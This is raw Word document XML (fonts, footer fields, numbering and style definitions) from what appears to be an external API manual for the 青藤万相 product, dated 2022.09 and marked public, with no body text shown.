    <w:embedBold r:id="rId2" w:subsetted="1" w:fontKey="{9CBDE44D-F389-45DB-A6E3-5BCA34DE4264}"/>
    <w:embedItalic r:id="rId3" w:subsetted="1" w:fontKey="{524B5302-941B-4B26-9E34-0E429644374F}"/>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Roboto">
    <w:altName w:val="Verdana"/>
    <w:panose1 w:val="02000000000000000000"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="E00002FF" w:usb1="5000205B" w:usb2="00000020" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="思源黑体 CN Normal">
    <w:altName w:val="黑体"/>
    <w:panose1 w:val="020B0400000000000000"/>
    <w:charset w:val="86"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="20000207" w:usb1="2ADF3C10" w:usb2="00000016" w:usb3="00000000" w:csb0="00060107"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86B7D" w14:textId="77777777" w:rsidR="007955E6" w:rsidRPr="00DA4190" w:rsidRDefault="007955E6">
    <w:pPr>
      <w:pStyle w:val="a9"/>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69BE" w14:textId="77777777" w:rsidR="007955E6" w:rsidRPr="00DA4190" w:rsidRDefault="007955E6">
    <w:pPr>
      <w:pStyle w:val="a9"/>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A4F1" w14:textId="77777777" w:rsidR="00FB10C9" w:rsidRPr="00DA4190" w:rsidRDefault="00FB10C9" w:rsidP="00336A2F">
    <w:pPr>
      <w:pStyle w:val="a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75F6D" w14:textId="3082FCB4" w:rsidR="00FB10C9" w:rsidRPr="00DA4190" w:rsidRDefault="00000000" w:rsidP="0014057C">
    <w:pPr>
      <w:pStyle w:val="a9"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:fldSimple w:instr=" DOCPROPERTY  日期  \* MERGEFORMAT ">
      <w:r w:rsidR="00506C5C">
        <w:t>2022.09</w:t>
      </w:r>
    </w:fldSimple>
    <w:r w:rsidR="00A057AD">
      <w:ptab w:relativeTo="margin" w:alignment="center" w:leader="none"/>
    </w:r>
    <w:r w:rsidR="00A057AD">
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r w:rsidR="00A057AD">
      <w:instrText xml:space="preserve"> PAGE  \* Arabic  \* MERGEFORMAT </w:instrText>
    </w:r>
    <w:r w:rsidR="00A057AD">
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="00A057AD">
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:t>3</w:t>
    </w:r>
    <w:r w:rsidR="00A057AD">
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r w:rsidR="00A057AD">
      <w:ptab w:relativeTo="margin" w:alignment="right" w:leader="none"/>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:instrText xml:space="preserve"> DOCPROPERTY  文档密级  \* MERGEFORMAT </w:instrText>
    </w:r>
    <w:r>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="00506C5C">
      <w:t>密级：公开</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26194" w14:textId="77777777" w:rsidR="00BB1115" w:rsidRPr="00DA4190" w:rsidRDefault="00BB1115" w:rsidP="00991E1C">
      <w:r w:rsidRPr="00DA4190">
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2D85C71C" w14:textId="77777777" w:rsidR="00BB1115" w:rsidRPr="00DA4190" w:rsidRDefault="00BB1115" w:rsidP="00991E1C">
      <w:r w:rsidRPr="00DA419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8A6ED" w14:textId="77777777" w:rsidR="007955E6" w:rsidRPr="00DA4190" w:rsidRDefault="007955E6">
    <w:pPr>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C03CC" w14:textId="4355DB06" w:rsidR="007955E6" w:rsidRPr="00DA4190" w:rsidRDefault="007955E6">
    <w:pPr>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4BA76" w14:textId="77777777" w:rsidR="007955E6" w:rsidRPr="00DA4190" w:rsidRDefault="007955E6">
    <w:pPr>
      <w:spacing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E373A" w14:textId="77777777" w:rsidR="00FB10C9" w:rsidRPr="00DA4190" w:rsidRDefault="00FB10C9">
    <w:pPr>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CD95E" w14:textId="17EA1359" w:rsidR="00FB10C9" w:rsidRPr="00DA4190" w:rsidRDefault="00F82C28">
    <w:pPr>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:kern w:val="0"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:kern w:val="0"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <w:instrText xml:space="preserve"> </w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
        <w:kern w:val="0"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <w:instrText>DOCPROPERTY  产品名称  \* MERGEFORMAT</w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:kern w:val="0"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <w:instrText xml:space="preserve"> </w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:kern w:val="0"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:proofErr w:type="gramStart"/>
    <w:r w:rsidR="00506C5C">
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
        <w:kern w:val="0"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <w:t>青藤万相</w:t>
    </w:r>
    <w:proofErr w:type="gramEnd"/>
    <w:r>
      <w:rPr>
        <w:kern w:val="0"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r w:rsidR="00A057AD" w:rsidRPr="00A057AD">
      <w:rPr>
        <w:kern w:val="0"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <w:ptab w:relativeTo="margin" w:alignment="center" w:leader="none"/>
    </w:r>
    <w:r w:rsidR="00A057AD">
      <w:rPr>
        <w:kern w:val="0"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:r w:rsidR="00A057AD" w:rsidRPr="00A057AD">
      <w:rPr>
        <w:kern w:val="0"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <w:ptab w:relativeTo="margin" w:alignment="right" w:leader="none"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:kern w:val="0"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:kern w:val="0"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <w:instrText xml:space="preserve"> </w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
        <w:kern w:val="0"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <w:instrText>DOCPROPERTY  手册名称  \* MERGEFORMAT</w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:kern w:val="0"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <w:instrText xml:space="preserve"> </w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:kern w:val="0"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="00506C5C">
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
        <w:kern w:val="0"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <w:t>外部</w:t>
    </w:r>
    <w:r w:rsidR="00506C5C">
      <w:rPr>
        <w:kern w:val="0"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
      <w:t>API手册</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:kern w:val="0"/>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228C9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3050F4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F9B6C3F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FA44B354"/>
    <w:lvl w:ilvl="0" w:tplc="0FE63B4C">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="a"/>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91E3BF2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1E32AF04"/>
    <w:lvl w:ilvl="0" w:tplc="997A7D92">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="a0"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="420" w:hanging="420"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>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4D9E618C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="793A4C72"/>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ascii="阿里巴巴普惠体 2.0 55 Regular" w:hAnsi="阿里巴巴普惠体 2.0 55 Regular" w:hint="eastAsia"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="4"/>
      <w:lvlText w:val="%1.%2.%3.%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="851" w:hanging="851"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="5"/>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15:restartNumberingAfterBreak="0">
    <w:nsid w:val="7211599F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="808601BA"/>
    <w:lvl w:ilvl="0" w:tplc="90D0EBF0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="a1"/>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787B633F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A5621580"/>
    <w:lvl w:ilvl="0" w:tplc="2F1A4206">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="a2"/>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448312228">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1142967292">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="880747693">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="210926000">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1833064434">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="561520932">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1352761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233110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47812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197359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1596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282264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37623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705248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071107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92951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665277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639134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324264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63929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813366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567519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015544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854926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248153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28305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65713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72232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534498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234267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133582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51215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692421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288343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05296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012612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118412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74129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197034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476066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98375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009210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16989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407112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444955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589834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424516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514101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98127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629560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080956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bordersDoNotSurroundHeader/>
  <w:bordersDoNotSurroundFooter/>
  <w:proofState w:spelling="clean" w:grammar="clean"/>
  <w:defaultTabStop w:val="420"/>
  <w:defaultTableStyle w:val="11"/>
  <w:drawingGridHorizontalSpacing w:val="207"/>
  <w:drawingGridVerticalSpacing w:val="423"/>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328B"/>
    <w:rsid w:val="000218C7"/>
    <w:rsid w:val="0004283D"/>
    <w:rsid w:val="000449B2"/>
    <w:rsid w:val="00052E87"/>
    <w:rsid w:val="0006313E"/>
    <w:rsid w:val="000833CF"/>
    <w:rsid w:val="00090665"/>
    <w:rsid w:val="000F2FBB"/>
    <w:rsid w:val="00100306"/>
    <w:rsid w:val="00107128"/>
    <w:rsid w:val="0014057C"/>
    <w:rsid w:val="001500ED"/>
    <w:rsid w:val="0015762B"/>
    <w:rsid w:val="00182C62"/>
    <w:rsid w:val="00193953"/>
    <w:rsid w:val="001A793A"/>
    <w:rsid w:val="001B378D"/>
    <w:rsid w:val="001C1391"/>
    <w:rsid w:val="001D4267"/>
    <w:rsid w:val="001F3812"/>
    <w:rsid w:val="002147C3"/>
    <w:rsid w:val="00236383"/>
    <w:rsid w:val="002649EA"/>
    <w:rsid w:val="002917F3"/>
    <w:rsid w:val="00295FAD"/>
    <w:rsid w:val="002B1F9E"/>
    <w:rsid w:val="002B4E8A"/>
    <w:rsid w:val="002D42B1"/>
    <w:rsid w:val="002D4DC1"/>
    <w:rsid w:val="0030404E"/>
    <w:rsid w:val="0033369B"/>
    <w:rsid w:val="0033527E"/>
    <w:rsid w:val="00336A2F"/>
    <w:rsid w:val="00346AC0"/>
    <w:rsid w:val="003513AD"/>
    <w:rsid w:val="00356CD7"/>
    <w:rsid w:val="003614D1"/>
    <w:rsid w:val="00365FA4"/>
    <w:rsid w:val="003C662E"/>
    <w:rsid w:val="00423D38"/>
    <w:rsid w:val="00426866"/>
    <w:rsid w:val="00433206"/>
    <w:rsid w:val="00434161"/>
    <w:rsid w:val="0047260D"/>
    <w:rsid w:val="0048029F"/>
    <w:rsid w:val="004932EC"/>
    <w:rsid w:val="00496D21"/>
    <w:rsid w:val="004A5D6D"/>
    <w:rsid w:val="004B3E47"/>
    <w:rsid w:val="004C7F6A"/>
    <w:rsid w:val="004F7A51"/>
    <w:rsid w:val="00506C5C"/>
    <w:rsid w:val="00516411"/>
    <w:rsid w:val="00547289"/>
    <w:rsid w:val="005556E8"/>
    <w:rsid w:val="00567454"/>
    <w:rsid w:val="005674B6"/>
    <w:rsid w:val="005759DF"/>
    <w:rsid w:val="005A156E"/>
    <w:rsid w:val="005B59E5"/>
    <w:rsid w:val="006532DD"/>
    <w:rsid w:val="006770DB"/>
    <w:rsid w:val="006931B2"/>
    <w:rsid w:val="006A0097"/>
    <w:rsid w:val="006B2C9F"/>
    <w:rsid w:val="006D4A0F"/>
    <w:rsid w:val="00714343"/>
    <w:rsid w:val="0073300C"/>
    <w:rsid w:val="0073445F"/>
    <w:rsid w:val="00786BBB"/>
    <w:rsid w:val="007955E6"/>
    <w:rsid w:val="007A7107"/>
    <w:rsid w:val="007B1A71"/>
    <w:rsid w:val="007B6AF0"/>
    <w:rsid w:val="007E0888"/>
    <w:rsid w:val="007E26E4"/>
    <w:rsid w:val="00820E55"/>
    <w:rsid w:val="00824F5A"/>
    <w:rsid w:val="00831D1E"/>
    <w:rsid w:val="00832C55"/>
    <w:rsid w:val="0084109E"/>
    <w:rsid w:val="00850657"/>
    <w:rsid w:val="008E265C"/>
    <w:rsid w:val="008E5C8A"/>
    <w:rsid w:val="008F0C57"/>
    <w:rsid w:val="008F0E6B"/>
    <w:rsid w:val="008F4FD6"/>
    <w:rsid w:val="009103FA"/>
    <w:rsid w:val="00922362"/>
    <w:rsid w:val="00964B15"/>
    <w:rsid w:val="00977F5F"/>
    <w:rsid w:val="009807A8"/>
    <w:rsid w:val="009823C3"/>
    <w:rsid w:val="00984E72"/>
    <w:rsid w:val="00991E1C"/>
    <w:rsid w:val="0099328B"/>
    <w:rsid w:val="00996B4D"/>
    <w:rsid w:val="009A74C5"/>
    <w:rsid w:val="009A7E12"/>
    <w:rsid w:val="009B25D9"/>
    <w:rsid w:val="009D5EE9"/>
    <w:rsid w:val="009E2545"/>
    <w:rsid w:val="009E58D0"/>
    <w:rsid w:val="00A01BE9"/>
    <w:rsid w:val="00A057AD"/>
    <w:rsid w:val="00A23B07"/>
    <w:rsid w:val="00A44EBF"/>
    <w:rsid w:val="00A6373E"/>
    <w:rsid w:val="00A906C7"/>
    <w:rsid w:val="00A972B0"/>
    <w:rsid w:val="00AA4BA9"/>
    <w:rsid w:val="00AC0734"/>
    <w:rsid w:val="00B24DC2"/>
    <w:rsid w:val="00B444F0"/>
    <w:rsid w:val="00B51CCF"/>
    <w:rsid w:val="00B53D9B"/>
    <w:rsid w:val="00BA1864"/>
    <w:rsid w:val="00BB1115"/>
    <w:rsid w:val="00BB264D"/>
    <w:rsid w:val="00BB33F0"/>
    <w:rsid w:val="00BC669E"/>
    <w:rsid w:val="00BD213B"/>
    <w:rsid w:val="00BE0A15"/>
    <w:rsid w:val="00BE368C"/>
    <w:rsid w:val="00BE46CD"/>
    <w:rsid w:val="00C20331"/>
    <w:rsid w:val="00C20931"/>
    <w:rsid w:val="00C43F31"/>
    <w:rsid w:val="00C6266E"/>
    <w:rsid w:val="00C62AA2"/>
    <w:rsid w:val="00C6390D"/>
    <w:rsid w:val="00C64D05"/>
    <w:rsid w:val="00C80A50"/>
    <w:rsid w:val="00C95A34"/>
    <w:rsid w:val="00CA1304"/>
    <w:rsid w:val="00CA4CBB"/>
    <w:rsid w:val="00CB4A20"/>
    <w:rsid w:val="00CB4F44"/>
    <w:rsid w:val="00CC58B3"/>
    <w:rsid w:val="00CE4554"/>
    <w:rsid w:val="00CF5620"/>
    <w:rsid w:val="00D10C8B"/>
    <w:rsid w:val="00D14DF4"/>
    <w:rsid w:val="00D17263"/>
    <w:rsid w:val="00D22F57"/>
    <w:rsid w:val="00D60126"/>
    <w:rsid w:val="00D8352B"/>
    <w:rsid w:val="00D90549"/>
    <w:rsid w:val="00DA13CB"/>
    <w:rsid w:val="00DA4190"/>
    <w:rsid w:val="00DB1379"/>
    <w:rsid w:val="00DB36D9"/>
    <w:rsid w:val="00DE4ECC"/>
    <w:rsid w:val="00E077D8"/>
    <w:rsid w:val="00E1009D"/>
    <w:rsid w:val="00E21ABB"/>
    <w:rsid w:val="00E44934"/>
    <w:rsid w:val="00E80B22"/>
    <w:rsid w:val="00E90B9C"/>
    <w:rsid w:val="00E93042"/>
    <w:rsid w:val="00E94518"/>
    <w:rsid w:val="00EB5002"/>
    <w:rsid w:val="00ED570A"/>
    <w:rsid w:val="00ED6121"/>
    <w:rsid w:val="00EF3FDE"/>
    <w:rsid w:val="00EF54BB"/>
    <w:rsid w:val="00F2299B"/>
    <w:rsid w:val="00F245F3"/>
    <w:rsid w:val="00F4714A"/>
    <w:rsid w:val="00F60976"/>
    <w:rsid w:val="00F61A3B"/>
    <w:rsid w:val="00F635FD"/>
    <w:rsid w:val="00F7691D"/>
    <w:rsid w:val="00F82C28"/>
    <w:rsid w:val="00F95487"/>
    <w:rsid w:val="00FA611F"/>
    <w:rsid w:val="00FB10C9"/>
    <w:rsid w:val="00FB58DB"/>
    <w:rsid w:val="00FB5A0A"/>
    <w:rsid w:val="00FD73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C6E656"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{7FB6B96E-DDA4-45C3-A3AD-C00A85226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uiPriority="9" w:qFormat="1"/>
    <w:lsdException w:name="heading 5" w:uiPriority="9"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F95487"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="阿里巴巴普惠体 2.0 55 Regular" w:eastAsia="阿里巴巴普惠体 2.0 55 Regular" w:hAnsi="阿里巴巴普惠体 2.0 55 Regular"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="a3"/>
    <w:next w:val="a3"/>
    <w:link w:val="10"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00193953"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:pageBreakBefore/>
      <w:numPr>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="4" w:space="1" w:color="D9D9D9" w:themeColor="background1" w:themeShade="D9"/>
      </w:pBdr>
      <w:spacing w:before="800" w:after="400"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="00A4C5"/>
      <w:kern w:val="44"/>
      <w:sz w:val="44"/>
      <w:szCs w:val="44"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="a3"/>
    <w:next w:val="a3"/>
    <w:link w:val="20"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="007B6AF0"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="200" w:after="200"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="宋体"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="36"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="a3"/>
    <w:next w:val="a3"/>
    <w:link w:val="30"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="009807A8"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="200" w:after="200"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="a3"/>
    <w:next w:val="a3"/>
    <w:link w:val="40"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="007B6AF0"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="3"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:snapToGrid w:val="0"/>
      <w:spacing w:before="200" w:after="200"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="宋体"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="30"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="5">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="a3"/>
    <w:next w:val="a3"/>
    <w:link w:val="50"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="007B6AF0"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="4"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="280" w:after="290" w:line="376" w:lineRule="auto"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="6">
    <w:name w:val="heading 6"/>
    <w:basedOn w:val="a3"/>
    <w:next w:val="a3"/>
    <w:link w:val="60"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005A156E"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="240" w:after="64" w:line="320" w:lineRule="auto"/>
      <w:outlineLvl w:val="5"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>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header"/>
    <w:basedOn w:val="a3"/>
    <w:link w:val="a8"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00991E1C"/>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4"/>
    <w:link w:val="a7"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00991E1C"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a9">
    <w:name w:val="footer"/>
    <w:basedOn w:val="a3"/>
    <w:link w:val="aa"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00991E1C"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4153"/>
        <w:tab w:val="right" w:pos="8306"/>
      </w:tabs>
      <w:snapToGrid w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="aa">
    <w:name w:val="页脚 字符"/>
    <w:basedOn w:val="a4"/>
    <w:link w:val="a9"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="00991E1C"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="10">
    <w:name w:val="标题 1 字符"/>
    <w:basedOn w:val="a4"/>
    <w:link w:val="1"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00193953"/>
    <w:rPr>
      <w:rFonts w:ascii="阿里巴巴普惠体 2.0 55 Regular" w:eastAsia="阿里巴巴普惠体 2.0 55 Regular" w:hAnsi="阿里巴巴普惠体 2.0 55 Regular"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="00A4C5"/>
      <w:kern w:val="44"/>
      <w:sz w:val="44"/>
      <w:szCs w:val="44"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="20">
    <w:name w:val="标题 2 字符"/>
    <w:basedOn w:val="a4"/>
    <w:link w:val="2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="007B6AF0"/>
    <w:rPr>
      <w:rFonts w:ascii="阿里巴巴普惠体 2.0 55 Regular" w:eastAsia="阿里巴巴普惠体 2.0 55 Regular" w:hAnsi="阿里巴巴普惠体 2.0 55 Regular" w:cs="宋体"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="36"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="30">
    <w:name w:val="标题 3 字符"/>
    <w:basedOn w:val="a4"/>
    <w:link w:val="3"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="009807A8"/>
    <w:rPr>
      <w:rFonts w:ascii="阿里巴巴普惠体 2.0 55 Regular" w:eastAsia="阿里巴巴普惠体 2.0 55 Regular" w:hAnsi="阿里巴巴普惠体 2.0 55 Regular"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="a3"/>
    <w:next w:val="a3"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E93042"/>
    <w:rPr>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="a3"/>
    <w:next w:val="a3"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00CF5620"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:pos="420"/>
        <w:tab w:val="right" w:leader="dot" w:pos="10181"/>
      </w:tabs>
      <w:spacing w:before="120"/>
    </w:pPr>
    <w:rPr>
      <w:bCs/>
      <w:color w:val="00A4C5"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC4">
    <w:name w:val="toc 4"/>
    <w:basedOn w:val="a3"/>
    <w:next w:val="a3"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00CF5620"/>
    <w:rPr>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Table">
    <w:name w:val="Table"/>
    <w:basedOn w:val="11"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00F95487"/>
    <w:rPr>
      <w:rFonts w:eastAsia="阿里巴巴普惠体 2.0 55 Regular"/>
      <w:kern w:val="0"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
    <w:tblPr/>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:rFonts w:eastAsia="阿里巴巴普惠体 2.0 55 Regular"/>
        <w:b/>
        <w:i w:val="0"/>
        <w:color w:val="FFFFFF" w:themeColor="background1"/>
        <w:sz w:val="21"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="00A4C5"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="SourceCode">
    <w:name w:val="Source Code"/>
    <w:basedOn w:val="a3"/>
    <w:link w:val="SourceCode0"/>
    <w:qFormat/>
    <w:rsid w:val="000833CF"/>
    <w:pPr>
      <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="阿里巴巴普惠体 2.0 55 Regular"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="SourceCode0">
